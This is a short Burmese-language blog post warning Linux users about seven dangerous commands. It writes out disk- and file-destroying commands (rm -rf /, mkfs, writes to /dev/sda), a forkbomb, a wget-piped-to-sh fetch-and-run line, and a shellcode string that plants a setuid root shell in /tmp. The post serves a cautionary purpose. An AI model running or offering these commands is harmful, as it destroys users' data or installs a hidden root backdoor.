Skip to content
General

becareful !! 7 dangerous Command in Linux

Chit Ko Ko

Contributor

2 min read

becareful !! 7 dangerous Command in Linux Command line

ကျွန်တော်တို့ Linux OS  တွင် powerful အဖြစ်ဆုံးက တော့ Command Line CLI ဖြစ်ပါသည် ။  Command Line CLI ကနေ သင်သည် program /software များကိုထည့်သွင်းခြင်း ၊ ပြန်ထုတ်ခြင်း တို့ကိုပြုလုပ်နိုင်သလို သင် ၏ စက်အတွင်းရှိ file များကို manage လုပ်နိုင်ပါသည်။

သင်အသုံးမပြုလိုသော ဖိုင်များကို ဖျက်ခြင်း ၊ ရွှေ့ ခြင်း ၊ ကူးယူခြင်း တို့ကို ပြုလုပ်နိုင်သလို သင်သည် မှားယွင်း၍ ပြုလုပ်မိမည်ဆိုပါက လည်း သင်၏ အရေး ကြီးအချက်အလက်များ ကို ဆုံးရှုံးရလိမ့် မည် ဖြစ်သည် ။

(၁) rm -rf /

ဒီ command သည် သင်၏ root directory အတွင်း ရှိ ဖိုင်များ ကို forcefully နှင့် recursively ဖျက်ဆီးပစ်မည်ဖြစ်ပါသည် ။

(၂)char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

အပေါ်က command နှင့်အတူတူပင် မိမိ မသိသော နားမလည်သော command တို့ကိုအသုံးမပြုရ၊

(၃) mkfs.ext3 /dev/sda

mkfs command ကသင်၏ hard disk ကို ဖျက်ပစ်မဲ့command ပါ။

(၄) :(){:|:&};:

 ဒီcommand ကတော့သင်ရဲ့စက်ကိုနှေးကွေးပြီးရပ်တန့်အောင်လုပ်မယ့်  ‘forkbomb’ command လို့ Linux circlesတွေမှာပြောပါတယ် ။

(၅) any_command > /dev/sda
သင်၏ data တွေကိုဖျက်ဆီးပစ် မှာပါ။

(၆) wget http://some_untrusted_source -O- | sh

ဘာမှန်းမသိတဲ့ code တွေကို download လုပ်ပြီး sh ဖိုင်အနေနဲ့ run သွားရင်တော့ သင်တော့  “သေပြီဆရာပဲ”
(၇) mv /home/yourhomedirectory/* /dev/null
သင့်ရဲ့ home folder ကို ဘာမှ မရှိ တဲ့ blackhole လိုနေရာကို ပို့ပေးမှာနော်…

ဒီအပေါ်ကအချက် (၇)ချက် ကပဲ သင့်ကိုအခက်တွေ့စေတာမဟုတ်ပါ ။Super user do လို sudo အနေနဲ့ command တစ်ခုကို မှားသုံးမိတယ်ဆိုလဲ  Linux ကတော့ ခွင့်ပြုမှာပါ။ ဘာကြောင့်လဲ ဆို ရင် Linux for Human beings ပေါ့ ။ 

အွန်လိုင်းမှာ click တာထက် ဒါကပိုပြီးကိုယ့်အတွက် အကျိုးမဲ့စေလို့ပါ ။”အရေးကြီးလို့ပြောနေတာနော့်”